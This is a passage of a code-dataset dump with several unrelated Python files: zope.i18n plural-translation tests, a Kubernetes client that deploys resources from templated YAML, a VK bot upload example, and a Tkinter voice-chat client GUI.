A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Test a gettext implementation of a Message Catalog.\n\"\"\"\nimport os\nimport unittest\n\nimport zope.component\nfrom zope.i18nmessageid import MessageFactory\n\nfrom zope.i18n import tests\nfrom zope.i18n import translate\nfrom zope.i18n.gettextmessagecatalog import GettextMessageCatalog\nfrom zope.i18n.interfaces import ITranslationDomain\nfrom zope.i18n.testing import compile_po\nfrom zope.i18n.translationdomain import TranslationDomain\n\n\nclass TestPlurals(unittest.TestCase):\n\n def _getMessageCatalog(self, locale, variant=\"default\"):\n path = os.path.dirname(tests.__file__)\n self._path = os.path.join(\n path, f'locale-{variant}', locale, 'LC_MESSAGES', f'{variant}.mo')\n compile_po(self._path)\n catalog = GettextMessageCatalog(locale, variant, self._path)\n return catalog\n\n def _getTranslationDomain(self, locale, variant=\"default\"):\n path = os.path.dirname(tests.__file__)\n self._path = os.path.join(\n path, f'locale-{variant}', locale, 'LC_MESSAGES', f'{variant}.mo')\n compile_po(self._path)\n catalog = GettextMessageCatalog(locale, variant, self._path)\n domain = TranslationDomain('default')\n domain.addCatalog(catalog)\n return domain\n\n def test_missing_queryPluralMessage(self):\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple', '%d apples', 0,\n dft1='One fruit', dft2='%d fruits'),\n '0 fruits')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple.', '%d apples.', 1,\n dft1='One fruit', dft2='%d fruits'),\n 'One fruit')\n\n self.assertEqual(\n catalog.queryPluralMessage(\n 'One apple.', '%d apples.', 2,\n dft1='One fruit', dft2='%d fruits'),\n '2 fruits')\n\n def test_missing_getPluralMessage(self):\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 0)\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 1)\n\n with self.assertRaises(KeyError):\n catalog.getPluralMessage('One apple', '%d fruits', 2)\n\n def test_GermanPlurals(self):\n \"\"\"Germanic languages such as english and german share the plural\n rule. 
We test the german here.\n \"\"\"\n catalog = self._getMessageCatalog('de')\n self.assertEqual(catalog.language, 'de')\n\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n 'Es gibt eine Datei.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n 'Es gibt 3 Dateien.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 0),\n 'Es gibt 0 Dateien.')\n\n # Unknown id\n self.assertRaises(KeyError, catalog.getPluralMessage,\n 'There are %d files.', 'bar', 6)\n\n # Query without default values\n self.assertEqual(catalog.queryPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n 'Es gibt eine Datei.')\n self.assertEqual(catalog.queryPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n 'Es gibt 3 Dateien.')\n\n # Query with default values\n self.assertEqual(catalog.queryPluralMessage(\n 'There are %d files.', 'There is one file.', 1,\n 'Es gibt 1 Datei.', 'Es gibt %d Dateien !', ),\n 'Es gibt 1 Datei.')\n self.assertEqual(catalog.queryPluralMessage(\n 'There are %d files.', 'There is one file.', 3,\n 'Es gibt 1 Datei.', 'Es gibt %d Dateien !', ),\n 'Es gibt 3 Dateien !')\n\n def test_PolishPlurals(self):\n \"\"\"Polish has a complex rule for plurals. It makes for a good\n test subject.\n \"\"\"\n catalog = self._getMessageCatalog('pl')\n self.assertEqual(catalog.language, 'pl')\n\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 0),\n \"Istnieją 0 plików.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1),\n \"Istnieje 1 plik.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3),\n \"Istnieją 3 pliki.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 17),\n \"Istnieją 17 plików.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 23),\n \"Istnieją 23 pliki.\")\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 28),\n \"Istnieją 28 plików.\")\n\n def test_floater(self):\n \"\"\"Test with the number being a float.\n We can use %f or %s to make sure it works.\n \"\"\"\n catalog = self._getMessageCatalog('en')\n self.assertEqual(catalog.language, 'en')\n\n # It's cast to integer because of the %d in the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 1.0),\n 'There is one file.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is one file.', 'There are %d files.', 3.5),\n 'There are 3 files.')\n\n # It's cast to a string because of the %s in the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'The item is rated 1/5 star.',\n 'The item is rated %s/5 stars.', 3.5),\n 'The item is rated 3.5/5 stars.')\n\n # It's cast either to an int or a float because of the %s in\n # the translation string.\n self.assertEqual(catalog.getPluralMessage(\n 'There is %d chance.',\n 'There are %f chances.', 1.5),\n 'There are 1.500000 chances.')\n self.assertEqual(catalog.getPluralMessage(\n 'There is %d chance.',\n 'There are %f chances.', 3.5),\n 'There are 3.500000 chances.')\n\n def test_translate_without_defaults(self):\n domain = self._getTranslationDomain('en')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d 
apples', number=0),\n '0 apples')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=1),\n 'One apple')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=2),\n '2 apples')\n\n def test_translate_with_defaults(self):\n domain = self._getTranslationDomain('en')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=0,\n default='One fruit', default_plural='%d fruits'),\n '0 fruits')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=1,\n default='One fruit', default_plural='%d fruits'),\n 'One fruit')\n self.assertEqual(\n translate('One apple', domain='default',\n msgid_plural='%d apples', number=2,\n default='One fruit', default_plural='%d fruits'),\n '2 fruits')\n\n def test_translate_message_without_defaults(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=0)),\n '0 apples')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=1)),\n 'One apple')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples',\n number=2)),\n '2 apples')\n\n def test_translate_message_with_defaults(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n zope.component.provideUtility(domain, ITranslationDomain, 'default')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=0,\n default='One fruit',\n default_plural='%d fruits')),\n '0 fruits')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=1,\n default='One fruit',\n default_plural='%d fruits')),\n 'One fruit')\n self.assertEqual(\n translate(factory('One apple', msgid_plural='%d apples', number=2,\n default='One fruit',\n default_plural='%d fruits')),\n '2 fruits')\n\n def test_translate_recursive(self):\n domain = self._getTranslationDomain('en')\n factory = MessageFactory('default')\n\n # Singular\n banana = factory('banana', msgid_plural='bananas', number=1)\n phrase = factory('There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n number=1, mapping={'type': banana})\n self.assertEqual(\n domain.translate(phrase, target_language=\"en\"),\n 'There is 1 banana.')\n\n # Plural\n apple = factory('apple', msgid_plural='apples', number=10)\n phrase = factory('There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n number=10, mapping={'type': apple})\n self.assertEqual(\n domain.translate(phrase, target_language=\"en\"),\n 'There are 10 apples.')\n\n # Straight translation with translatable mapping\n apple = factory('apple', msgid_plural='apples', number=75)\n self.assertEqual(\n domain.translate(msgid='There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n mapping={'type': apple},\n target_language=\"en\", number=75),\n 'There are 75 apples.')\n\n # Add another catalog, to test the domain's catalogs iteration\n # We add this catalog in first position, to resolve the translations\n # there first.\n alt_en = self._getMessageCatalog('en', variant=\"alt\")\n domain._data[alt_en.getIdentifier()] = alt_en\n domain._catalogs[alt_en.language].insert(0, alt_en.getIdentifier())\n\n apple = factory('apple', msgid_plural='apples', 
number=42)\n self.assertEqual(\n domain.translate(msgid='There is %d ${type}.',\n msgid_plural='There are %d ${type}.',\n mapping={'type': apple},\n target_language=\"de\", number=42),\n 'There are 42 oranges.')\n","sub_path":"src/zope/i18n/tests/test_plurals.py","file_name":"test_plurals.py","file_ext":"py","file_size_in_byte":12821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"250934359","text":"import re\nfrom base64 import b64decode\nfrom collections import defaultdict\nfrom tempfile import NamedTemporaryFile\nfrom typing import TYPE_CHECKING, List, Optional\n\nimport kubernetes\nimport requests\nimport yaml\nfrom urllib3.exceptions import MaxRetryError\n\nfrom hermes.cloudbreak.kubernetes.base import (\n DaemonSet,\n Deployment,\n Resource,\n Service,\n)\nfrom hermes.cloudbreak.utils import snakeify\n\nif TYPE_CHECKING:\n from hermes.cloudbreak.clouds.base.kubernetes import Cluster\n\n\nclass K8sApiClient:\n def __init__(self, cluster: \"Cluster\"):\n # TODO: generalize the initialization putting methods\n # on the `cluster` object to return the appropriate\n # information\n try:\n response = cluster.get()\n except requests.HTTPError as e:\n if e.code == 404:\n raise RuntimeError(f\"Cluster {cluster} not currently deployed\")\n raise\n\n # create configuration using bare minimum info\n configuration = kubernetes.client.Configuration()\n configuration.host = f\"https://{response.endpoint}\"\n\n with NamedTemporaryFile(delete=False) as ca_cert:\n certificate = response.master_auth.cluster_ca_certificate\n ca_cert.write(b64decode(certificate))\n\n cluster.refresh_credentials()\n configuration.ssl_ca_cert = ca_cert.name\n configuration.api_key_prefix[\"authorization\"] = \"Bearer\"\n configuration.api_key[\"authorization\"] = cluster.token.decode()\n\n # return client instantiated with configuration\n self.cluster = cluster\n self._client = kubernetes.client.ApiClient(configuration)\n\n # look in some default locations for existing resources\n self._deployments = defaultdict(dict)\n self._services = defaultdict(dict)\n self._daemon_sets = defaultdict(dict)\n\n self.get_resources_for_namespace(\"default\")\n self.get_resources_for_namespace(\"kube-system\")\n\n def _add_resource(self, resource):\n resources = getattr(\n self, \"_\" + snakeify(resource.__class__.__name__) + \"s\"\n )\n resources[resource.namespace][resource.name] = resource\n\n def get_resources_for_namespace(self, namespace: str):\n apps_client = kubernetes.client.AppsV1Api(self._client)\n for deployment in apps_client.list_namespaced_deployment(\n namespace\n ).items:\n deployment = Deployment(self, deployment.metadata.name, namespace)\n self._add_resource(deployment)\n\n for daemon_set in apps_client.list_namespaced_daemon_set(\n namespace\n ).items:\n daemon_set = DaemonSet(self, daemon_set.metadata.name, namespace)\n self._add_resource(daemon_set)\n\n core_client = kubernetes.client.CoreV1Api(self._client)\n for service in core_client.list_namespaced_service(namespace).items:\n service = Service(self, service.metadata.name, namespace)\n self._add_resource(service)\n\n def create_from_yaml(\n self,\n file: str,\n repo: Optional[str] = None,\n branch: Optional[str] = None,\n exists_ok: bool = True,\n **kwargs,\n ) -> List[Resource]:\n # get deploy file content either from\n # local file or from github repo. 
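The Polish expectations above follow the plural rule usually shipped in Polish catalogs' Plural-Forms header, `nplurals=3; plural=(n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)`. Transcribed to Python, it reproduces every case in the test:

```python
def polish_plural_index(n):
    """Index into the three Polish plural forms for a count n."""
    if n == 1:
        return 0                                    # 'Istnieje 1 plik.'
    if 2 <= n % 10 <= 4 and not 10 <= n % 100 < 20:
        return 1                                    # 'Istnieją %d pliki.'
    return 2                                        # 'Istnieją %d plików.'

forms = ['plik', 'pliki', 'plików']
for n in (0, 1, 3, 17, 23, 28):
    print(n, forms[polish_plural_index(n)])
# 0 plików / 1 plik / 3 pliki / 17 plików / 23 pliki / 28 plików,
# matching test_PolishPlurals above.
```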
Parse\n # yaml go template wildcards with kwargs\n content = get_content(file, repo, branch, **kwargs)\n\n failures = []\n k8s_objects = []\n\n # loop through content explicitly so that we\n # can preserver order for returning things\n for yml_document in content.split(\"---\\n\"):\n if not yml_document:\n continue\n\n # load the string to a dict\n yml_document = yaml.safe_load(yml_document)\n\n try:\n # first try to create the resource, assuming\n # it doesn't exist\n created = Resource.create(self, yml_document)\n\n # add the created resource to our internal\n # mapping of resources, and append it to return\n self._add_resource(created)\n k8s_objects.append(created)\n except kubernetes.utils.FailToCreateError as failure:\n # kubernetes exception in creation. Keep track\n # of all that get raised and raise them at the end\n for exc in failure.api_exceptions:\n if exc.status == 409 and exists_ok:\n # if the exception was that the object already\n # exists in the namespace and we indicated that\n # this was ok, find a workaround to return the\n # appropriate object\n metadata = yml_document[\"metadata\"]\n kind = yml_document[\"kind\"]\n\n try:\n # try to get an object that's already been\n # created if one exists\n resources = getattr(\n self, \"_\" + snakeify(kind) + \"s\"\n )\n created = resources[metadata[\"namespace\"]][\n metadata[\"name\"]\n ]\n except KeyError:\n # do a lazy creation of the object using\n # the metadata\n if kind == \"Deployment\":\n cls = Deployment\n elif kind == \"Service\":\n cls = Service\n elif kind == \"DaemonSet\":\n cls = DaemonSet\n else:\n raise ValueError(\n \"Resource kind {} not supported \".format(\n kind\n )\n )\n\n # create the object via regular initialization\n created = cls(\n self, metadata[\"name\"], metadata[\"namespace\"]\n )\n\n # add the object to internal resource mapping\n self._add_resource(created)\n\n # either way append the object to our returns\n k8s_objects.append(created)\n else:\n # in any other case, keep track of the exception\n # to raise later\n failures.append(exc)\n except MaxRetryError:\n raise RuntimeError(\n \"Cluster occupied and couldn't connect to create\"\n )\n\n if failures:\n # raise any and all kubernetes failures at once if we have any\n raise kubernetes.utils.FailToCreateError(failures)\n\n # otherwise return all the relevant objects\n # that were specified in the yaml\n return k8s_objects\n\n\ndef get_content(\n file: str,\n repo: Optional[str] = None,\n branch: Optional[str] = None,\n **kwargs,\n) -> str:\n if repo is not None:\n if branch is None:\n # if we didn't specify a branch, default to\n # trying main first but try master next in\n # case the repo hasn't changed yet\n branches = [\"main\", \"master\"]\n else:\n # otherwise just use the specified branch\n branches = [branch]\n\n for branch in branches:\n url = f\"https://raw.githubusercontent.com/{repo}/{branch}/{file}\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n content = response.content.decode()\n break\n except Exception:\n pass\n else:\n raise ValueError(\n \"Couldn't find file {} at github repo {} \"\n \"in branches {}\".format(file, repo, \", \".join(branches))\n )\n else:\n with open(file, \"r\") as f:\n content = f.read()\n\n return sub_values(content, **kwargs)\n\n\ndef sub_values(content: str, **kwargs) -> str:\n \"\"\"Sub wildcard values into string\n\n Hacky replacement for helm-style variable values in\n K8s YAML descriptions. Wildcards are specified in\n `content` via {{ .Values. 
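`create_from_yaml` above treats HTTP 409 (AlreadyExists) as success when `exists_ok` is set, then falls back to looking the resource up. The same idempotent-create shape for a single Deployment, assuming the official `kubernetes` Python client:

```python
import kubernetes
from kubernetes.client.rest import ApiException

def create_or_get_deployment(api_client, body, namespace='default'):
    """Create a Deployment, tolerating 409 Conflict when it already exists."""
    apps = kubernetes.client.AppsV1Api(api_client)
    try:
        return apps.create_namespaced_deployment(namespace, body)
    except ApiException as exc:
        if exc.status != 409:       # anything but AlreadyExists is fatal
            raise
        # already there: read it back instead, mirroring the exists_ok path
        return apps.read_namespaced_deployment(body['metadata']['name'],
                                               namespace)
```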
}}, and will\n be replaced by their value in `**kwargs`. If a variable\n value is not given a kwarg, or if a kwarg is passed\n without a relevant wildcard, a ValueError is raised\n \"\"\"\n\n match_re = re.compile(\"(?<={{ .Values.)[a-zA-Z0-9]+?(?= }})\")\n found = set()\n\n def replace_fn(match):\n varname = match_re.search(match.group(0)).group(0)\n found.add(varname)\n try:\n return str(kwargs[varname])\n except KeyError:\n raise ValueError(f\"No value provided for wildcard {varname}\")\n\n content = re.sub(\"{{ .Values.[a-zA-Z0-9]+? }}\", replace_fn, content)\n\n missing = set(kwargs) - found\n if missing:\n raise ValueError(\n \"Provided unused wildcard values: {}\".format(\", \".join(missing))\n )\n return content\n","sub_path":"libs/hermes/hermes.cloudbreak/hermes/cloudbreak/kubernetes/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330538365","text":"import os\n\nfrom vkbottle.bot import Bot, Message\nfrom vkbottle.tools import DocMessagesUploader\n\nbot = Bot(os.environ[\"token\"])\n\n\n# already uploaded picture\n@bot.on.message(command=\"ларс\")\nasync def lars_handler(m: Message):\n await m.answer(attachment=\"photo-41629685_457239401\")\n\n\n# on-handler processing upload\n@bot.on.message(command=\"ридми\")\nasync def readme_handler(m: Message):\n doc = await DocMessagesUploader(bot.api).upload(\n \"readme.md\", \"../../README.md\", peer_id=m.peer_id\n )\n await m.answer(attachment=doc)\n\n\nbot.run_forever()\n","sub_path":"examples/high-level/photo_upload_example.py","file_name":"photo_upload_example.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"592389056","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom threading import Thread, enumerate, active_count\nimport time\nfrom winsound import PlaySound, SND_LOOP, SND_ASYNC, SND_PURGE\nfrom client.gui_methods import center_window, pop_up_message\nfrom client import ask_server\nfrom client.chat_client import ChatClient\n\n\n# creates the pages and shows them\nclass App(Tk):\n start_page_background = r\"..\\media\\bg_pic.png\"\n\n def __init__(self, *args, **kwargs):\n Tk.__init__(self, *args, **kwargs)\n self.title('VoiceChat')\n # Setup Frame\n self.container = Frame(self)\n self.container.pack(side=\"top\", fill=\"both\", expand=True)\n self.container.grid_rowconfigure(0, weight=1)\n self.container.grid_columnconfigure(0, weight=1)\n\n self.username = ''\n self.target = ''\n self.user_called = ''\n\n self.frames = {}\n\n self.sp_background = PhotoImage(file=App.start_page_background)\n\n # self.threading_state() # used for debugging\n self.create_frames()\n center_window(self)\n self.show_frame(StartPage)\n # The following three commands are needed so the window pops\n # up on top on Windows...\n self.iconify()\n self.update()\n self.deiconify()\n\n def create_frames(self):\n for F in (StartPage, Login, Register, Main, Calling, Called, Chat):\n frame = F(self.container, self)\n self.frames[F] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n def show_frame(self, context):\n frame = self.frames[context]\n frame.tkraise()\n\n def threading_state(self, wait=8000):\n threads = [thread.getName() for thread in enumerate() if thread.getName() != 'MainThread']\n if threads:\n print('threads num:', active_count() - 1)\n print(threads)\n self.after(wait, self.threading_state)\n\n\n# chat 
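`sub_values` resolves `{{ .Values.name }}` wildcards with a replacement function and errors on anything unmatched. The core trick, condensed here to a single capturing pattern instead of the lookbehind pair used above:

```python
import re

def render(template, **values):
    """Replace {{ .Values.name }} markers, erroring on unknown names."""
    def repl(match):
        name = match.group(1)
        if name not in values:
            raise ValueError(f"No value provided for wildcard {name}")
        return str(values[name])
    return re.sub(r"{{ \.Values\.([a-zA-Z0-9]+?) }}", repl, template)

yaml_tpl = "replicas: {{ .Values.replicas }}\nimage: {{ .Values.image }}"
print(render(yaml_tpl, replicas=3, image="nginx:1.25"))
# replicas: 3
# image: nginx:1.25
```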
page\nclass Chat(Frame):\n def __init__(self, master, controller):\n super().__init__(master)\n self.controller = controller\n self.msg = Label(self, font=('Ariel', 20), foreground='green')\n self.msg.pack()\n Button(self, text='End Chat', command=self.stop_chat).pack()\n\n def stop_chat(self):\n ask_server.stop(self.controller.username, 'call')\n\n def start_chat(self):\n user = self.controller.target\n if not user:\n user = self.controller.user_called\n self.msg['text'] = f'In chat with {user}'\n self.client = ChatClient()\n Thread(target=self.chat_ended, name='chat_ended', daemon=True).start()\n self.client.start()\n\n def chat_ended(self):\n time.sleep(2)\n while True:\n time.sleep(1)\n if not ask_server.is_in_chat(self.controller.username):\n self.client.end()\n self.controller.show_frame(Main)\n time.sleep(0.4)\n self.controller.frames[Called].start_checking()\n break\n\n\n# receiving or making a call page\nclass Main(Frame):\n def __init__(self, master, controller):\n super().__init__(master)\n self.users = Listbox(self, fg='green', font=('Ariel', 12))\n self.target_name = Entry(self, font=('Ariel', 12))\n self.controller = controller\n self.set()\n self.set_users_list()\n\n def set(self):\n Label(self, text='Call to', font=('Ariel', 20), foreground='magenta').pack(side=TOP)\n self.target_name.pack()\n Button(self, text='Call', command=self.pre_call).pack()\n Label(self, text='Users', font=('Ariel', 18), foreground='blue').pack()\n self.users.pack()\n self.users.bind('<>', self.to_entry)\n self.bind('', self.pre_call)\n self.target_name.focus_set()\n\n # create list of users\n def set_users_list(self):\n self.users.delete(0, END)\n users = ask_server.user_lists()\n for user in users:\n if user != self.controller.username:\n self.users.insert(END, user)\n if self.users.size() < 10:\n self.users.configure(height=self.users.size())\n self.after(5000, self.set_users_list)\n\n # put a user in entry\n def to_entry(self, event=None):\n index = self.users.curselection()\n name = self.users.get(index)\n self.target_name.delete(0, END)\n self.target_name.insert(0, name)\n\n # checks if name valid, if so runs call\n def pre_call(self, event=None):\n target = self.target_name.get()\n self.target_name.delete(0, END)\n if len(target) > 2 and target != self.controller.username:\n if ask_server.is_user(target): # checks if the user exists\n self.controller.target = target\n self.controller.show_frame(Calling)\n self.controller.frames[Calling].call()\n else:\n pop_up_message(f\"sorry, the user '{target}' is not registered yet\")\n elif len(target) < 3:\n pop_up_message('sorry, the name is too short, at least 3 characters')\n else:\n pop_up_message(\"you can't call yourself\")\n\n\n# waiting for a call to be answered page\nclass Calling(Frame):\n ring = r\"..\\media\\calling_ring.wav\"\n\n def __init__(self, master, controller):\n super().__init__(master)\n self.controller = controller\n self.cancel = False\n self.label = Label(self, font=('Ariel', 20), foreground='magenta')\n self.label.pack()\n Button(self, text='Cancel Call', command=self.stop_calling).pack()\n\n def call(self):\n # print(f'calling {self.controller.target}')\n self.label['text'] = f'Calling {self.controller.target}...'\n Thread(target=self.calling, name='calling', daemon=True).start()\n\n # cancels call\n def stop_calling(self):\n ask_server.stop(self.controller.username, 'calling')\n self.cancel = True\n\n # checks if target agreed to chat\n def answer(self, timeout=1):\n max_time = time.time() + 60 * timeout # 1 minutes from 
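`set_users_list` above refreshes the Listbox every five seconds by re-arming itself with `after`, which keeps the Tk event loop responsive — no thread and no sleep involved. The pattern in isolation, as a self-updating clock label:

```python
import time
import tkinter as tk

def tick(label):
    label.config(text=time.strftime('%H:%M:%S'))
    # after() re-arms the callback on the event loop, so clicks and
    # redraws keep being processed between updates
    label.after(1000, tick, label)

# Usage (needs a display):
# root = tk.Tk(); lbl = tk.Label(root); lbl.pack(); tick(lbl); root.mainloop()
```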
now\n # check if 'calling' changed to 'call'\n PlaySound(Calling.ring, SND_LOOP + SND_ASYNC)\n while True:\n time.sleep(1)\n if self.cancel:\n result = 'canceled'\n # print(result)\n break\n if time.time() > max_time:\n result = 'timed_out'\n break\n if ask_server.is_in_chat(self.controller.username):\n result = 'accepted'\n break\n if not ask_server.not_rejected(self.controller.username, self.controller.target):\n result = 'rejected'\n break\n PlaySound(None, SND_PURGE)\n return result\n\n # calls and handle the call\n def calling(self):\n is_posted = ask_server.call(self.controller.username, self.controller.target)\n if is_posted:\n # print('call posted')\n result = self.answer(1)\n if result == 'accepted':\n # print('call accepted')\n self.controller.show_frame(Chat)\n self.controller.frames[Chat].start_chat()\n else:\n self.controller.show_frame(Main)\n if result == 'timed_out': # waited too long for response from the call target\n pop_up_message(\"call canceled, didn't receive answer in time\")\n # print(\"call canceled, didn't receive answer in time\")\n elif result == 'canceled':\n self.cancel = False\n elif result == 'rejected':\n pop_up_message(\"call rejected\")\n # print(\"call canceled\")\n\n else: # error, call already exists, handling\n # print('error')\n ask_server.stop(self.controller.username, 'calling')\n self.calling()\n\n\n# receiving a call page\nclass Called(Frame):\n ring = r\"..\\media\\called_ring.wav\"\n\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n\n self.text1 = Label(self, font=('Ariel', 20), foreground='magenta')\n self.text1.pack()\n self.bind('', self.yes)\n yes = Button(self, text='yes', command=self.yes)\n yes.focus_set()\n yes.pack()\n Button(self, text='no', command=self.no).pack()\n\n def start_checking(self):\n Thread(target=self.called, name='called', daemon=True).start()\n\n def called(self):\n # print(f'hi {self.controller.username}, waiting for a call')\n while True:\n if ask_server.look_for_call(self.controller.username):\n self.controller.show_frame(Called)\n user = ask_server.get_src_name(self.controller.username)\n self.controller.user_called = user\n # print(f'{user} called')\n self.text1['text'] = f'you got a call from {user}\\ndo you want to answer'\n PlaySound(Called.ring, SND_LOOP + SND_ASYNC)\n break\n if ask_server.is_in_chat(self.controller.username): # when calling and call was approved\n break\n time.sleep(1)\n\n def yes(self):\n PlaySound(None, SND_PURGE)\n successful = ask_server.accept(self.controller.user_called, self.controller.username)\n if successful == 'True':\n time.sleep(0.5)\n self.controller.show_frame(Chat)\n self.controller.frames[Chat].start_chat()\n else:\n pop_up_message('call was canceled')\n # print('call was canceled')\n ask_server.stop(self.controller.username, 'calling')\n self.controller.show_frame(Main)\n self.start_checking()\n\n def no(self):\n ### is this how i wanna handle that? 
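`Calling.answer` polls several conditions once per second until one fires or a deadline passes. The same loop generalized, with hypothetical predicates standing in for the `ask_server` calls:

```python
import time

def poll_until(checks, timeout=60.0, interval=1.0):
    """Poll named predicates until one fires or the deadline passes.

    checks: dict mapping result name -> zero-argument callable.
    """
    deadline = time.time() + timeout
    while time.time() < deadline:
        for name, predicate in checks.items():
            if predicate():
                return name
        time.sleep(interval)
    return 'timed_out'

# Hypothetical state flag in place of ask_server.is_in_chat(...):
state = {'accepted': False}
result = poll_until({'accepted': lambda: state['accepted']},
                    timeout=0.1, interval=0.02)
assert result == 'timed_out'
```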
the caller dont check if we canceled\n PlaySound(None, SND_PURGE)\n ask_server.stop(self.controller.username, 'calling')\n self.controller.show_frame(Main)\n self.start_checking()\n\n\n# front page of the app\nclass StartPage(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n background_label = Label(self, image=controller.sp_background)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n Label(self, text='Welcome to VOICECHAT, please log in to continue',\n font=('Ariel', 18), foreground='orange').pack(padx=5, pady=5)\n Button(self, text='login', command=lambda: controller.show_frame(Login)).pack()\n Label(self, text='Not registered yet? Do it now',\n font=('Ariel', 15), foreground='blue').pack(padx=5, pady=5)\n Button(self, text='register', command=lambda: controller.show_frame(Register)).pack()\n\n\n# login page\nclass Login(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n # Label(self, text='Login', font=('Ariel', 20), foreground='orange').grid()\n self.entry_name = Entry(self)\n self.entry_pas = Entry(self, show='*')\n name = Label(self, text='Name')\n pas = Label(self, text='Password')\n enter = Button(self, text='Enter', command=self.collect)\n self.bind('', self.collect)\n self.entry_name.focus_set()\n # grid & pack\n name.grid(row=0, sticky=E)\n pas.grid(row=1, sticky=E)\n self.entry_name.grid(row=0, column=1)\n self.entry_pas.grid(row=1, column=1)\n enter.grid()\n\n def enter(self, name, pas):\n is_connected = ask_server.login(name, pas)\n if is_connected:\n self.controller.username = name\n pop_up_message(f\"you're in, {name}\")\n self.controller.create_frames()\n self.controller.show_frame(Main)\n self.controller.frames[Called].start_checking()\n else:\n self.entry_name.delete(0, END)\n self.entry_pas.delete(0, END)\n pop_up_message(\"name or password is incorrect\")\n\n def collect(self):\n name = self.entry_name.get()\n pas = self.entry_pas.get()\n self.enter(name, pas)\n\n\n# register page\nclass Register(Frame):\n def __init__(self, parent, controller):\n super().__init__(parent)\n self.controller = controller\n # Label(self, text='Register', font=('Ariel', 20), foreground='blue').grid()\n self.entry_name = Entry(self)\n self.entry_password = Entry(self)\n name = Label(self, text='Name')\n pas = Label(self, text='Password')\n enter = Button(self, text='Register', command=self.handle)\n self.bind('', self.handle)\n self.entry_name.focus_set()\n\n # grid & pack\n name.grid(row=0, sticky=E)\n pas.grid(row=1, sticky=E)\n self.entry_name.grid(row=0, column=1)\n self.entry_password.grid(row=1, column=1)\n enter.grid()\n\n def handle(self, event=None):\n # acquire args\n name = self.entry_name.get()\n pas = self.entry_password.get()\n self.entry_name.delete(0, END)\n self.entry_password.delete(0, END)\n # checks if valid\n if len(name) < 3 or len(pas) < 3:\n pop_up_message('name and password must be at least 3 characters')\n # add to database unless name is already used\n else:\n success = ask_server.register(name, pas)\n if success:\n # pop_up_message('added to database')\n self.controller.frames[Login].enter(name, pas)\n else:\n pop_up_message('username already used')\n\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()\n","sub_path":"client/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":13663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345175235","text":"# 
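The `App` class above grids every page into the same cell of one container and switches pages with `tkraise`; nothing is destroyed or re-created. A minimal stand-alone version of that stacked-frame pattern:

```python
import tkinter as tk

class MiniApp(tk.Tk):
    """Stack every page in one grid cell; tkraise() picks the visible one."""

    def __init__(self):
        super().__init__()
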